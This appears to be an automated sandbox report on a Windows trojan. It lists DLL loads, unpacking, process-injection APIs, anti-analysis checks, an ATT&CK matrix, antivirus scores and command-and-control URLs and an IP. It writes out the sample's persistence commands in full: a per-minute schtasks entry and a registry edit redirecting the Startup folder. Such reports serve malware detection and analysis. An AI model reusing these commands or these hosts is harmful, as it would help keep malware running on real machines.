              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: appresolver.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: S7AGd447vH.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: OfficeDesktop.pdb source: S7AGd447vH.exe, dllhost.exe.0.dr
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Users\user\Desktop\S7AGd447vH.exe Unpacked PE file: 0.2.S7AGd447vH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Unpacked PE file: 7.2.dllhost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Unpacked PE file: 0.2.S7AGd447vH.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Unpacked PE file: 7.2.dllhost.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_00402310 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00402310
              Source: dllhost.exe.0.dr Static PE information: real checksum: 0x64e0b should be: 0x72178
              Source: S7AGd447vH.exe Static PE information: real checksum: 0x64e0b should be: 0x72178
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00411076 push ecx; ret 0_2_00411089
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_00401DF4 push eax; ret 11_2_00401E22

              Persistence and Installation Behavior

              Source: Yara match File source: dump.pcap, type: PCAP
              Source: Yara match File source: 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTR
              Source: C:\Users\user\Desktop\S7AGd447vH.exe File created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe

              Boot Survival

              Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_00405AE4 SetWindowLongW,CreateCompatibleDC,SetTimer,LoadStringW,GetWindowLongW,KillTimer,AnimateWindow,PostMessageW,PostQuitMessage,BeginPaint,BitBlt,EndPaint,IsIconic,GetWindowRect,OffsetRect,CreateRoundRectRgn,SetWindowRgn,DeleteObject,DeleteObject,DefWindowProcW,11_2_00405AE4
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: dllhost.exe, 00000007.00000002.1820379958.00000000006A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL7B
              Source: S7AGd447vH.exe, 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: COMBASE.DLL%SYSTEMROOT%\SYSTEM32\COMBASE.DLLZWPROTECTVIRTUALMEMORYNTDLL.DLL%SYSTEMROOT%\SYSTEM32\NTDLL.DLLISWOW64PROCESSKERNEL32.DLLASWHOOK.DLL
              Source: S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3ISWOW64PROCESSKERNEL32.DLLASWHOOK.DLLCOMBASE.DLL%SYSTEMROOT%\SYSTEM32\COMBASE.DLLZWPROTECTVIRTUALMEMORYNTDLL.DLL%SYSTEMROOT%\SYSTEM32\NTDLL.DLL@B
              Source: S7AGd447vH.exe, 00000000.00000002.1708919180.000000000239F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000002.1820486945.00000000022BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: dllhost.exe, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_00407DE4 rdtsc 11_2_00407DE4
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Thread delayed: delay time: 180000
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Window / User API: threadDelayed 887
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Window / User API: threadDelayed 1123
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Window / User API: threadDelayed 4077
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7612 Thread sleep time: -2610000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7724 Thread sleep time: -159660000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7716 Thread sleep time: -202140000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7652 Thread sleep time: -84750s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7720 Thread sleep time: -6660000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7724 Thread sleep time: -733860000s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_004048B0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_004048B0
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Thread delayed: delay time: 30000
              Source: dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1775452885.00000000008C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_004154F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004154F3
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_3_00580046 mov eax, dword ptr fs:[00000030h] 0_3_00580046
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_004169A2 mov eax, dword ptr fs:[00000030h] 0_2_004169A2
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00412C11 mov eax, dword ptr fs:[00000030h] 0_2_00412C11
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_7FE4208F mov eax, dword ptr fs:[00000030h] 0_2_7FE4208F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 1_3_005F0046 mov eax, dword ptr fs:[00000030h] 1_3_005F0046
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 7_3_004E0046 mov eax, dword ptr fs:[00000030h] 7_3_004E0046
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 7_2_7FE4208F mov eax, dword ptr fs:[00000030h] 7_2_7FE4208F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_00406AE4 mov eax, dword ptr fs:[00000030h] 11_2_00406AE4
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00401F40 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,0_2_00401F40
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00411203 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00411203
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00410E53 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00410E53
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00410FB8 SetUnhandledExceptionFilter,0_2_00410FB8
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_004061E4 HeapCreate,HeapAlloc,HeapAlloc,HeapAlloc,TlsAlloc,TlsSetValue,RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,TlsFree,KiUserCallbackDispatcher,HeapDestroy,11_2_004061E4
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_00401E4C SetUnhandledExceptionFilter,11_2_00401E4C
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Code function: 11_2_00401E3D SetUnhandledExceptionFilter,11_2_00401E3D

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Network Connect: 72.52.178.23 80
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_004023F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,0_2_004023F0
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Process created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe"
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00410C73 cpuid 0_2_00410C73
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformation
Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00411091 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00411091
Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_00401F40 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,0_2_00401F40
Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_0041F3E4 _free,GetTimeZoneInformation,0_2_0041F3E4
Source: C:\Users\user\Desktop\S7AGd447vH.exe Code function: 0_2_004048B0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_004048B0

              Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Command and Scripting Interpreter | 1 Scheduled Task/Job | 211 Process Injection | 1 Modify Registry | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | LSASS Memory | 231 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Native API | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 211 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | NTDS | 11 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 24 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph: ID 1564918, Sample: S7AGd447vH.exe, Startdate: 29/11/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
S7AGd447vH.exe | 66% | ReversingLabs | Win32.Trojan.Generic |
S7AGd447vH.exe | 69% | Virustotal | | Browse
S7AGd447vH.exe | 100% | Avira | TR/Fraud.Gen8 |
S7AGd447vH.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe | 100% | Avira | TR/Fraud.Gen8 |
C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe | 66% | ReversingLabs | Win32.Trojan.Generic |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://web.xmlpo | 0% | Avira URL Cloud | safe |
http://web.xQ | 0% | Avira URL Cloud | safe |
web.jsonpost.xyz/sj2vMs/index.php | 100% | Avira URL Cloud | phishing |
http://web.xmlpost.x | 0% | Avira URL Cloud | safe |
web.xmlpost.xyz/sj2vMs/index.php | 100% | Avira URL Cloud | phishing |
web.xmlpost.xyz/sj2vMs/index.php | 0% | Virustotal | | Browse
web.jsonpost.xyz/sj2vMs/index.php | 10% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
web.jsonpost.xyz | 72.52.178.23 | true | false | | high
web.xmlpost.xyz | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://web.jsonpost.xyz/ | false | | high
web.xmlpost.xyz/sj2vMs/index.php | true | 0%, Virustotal, Browse; Avira URL Cloud: phishing | unknown
http://web.jsonpost.xyz/sj2vMs/index.php | false | | high
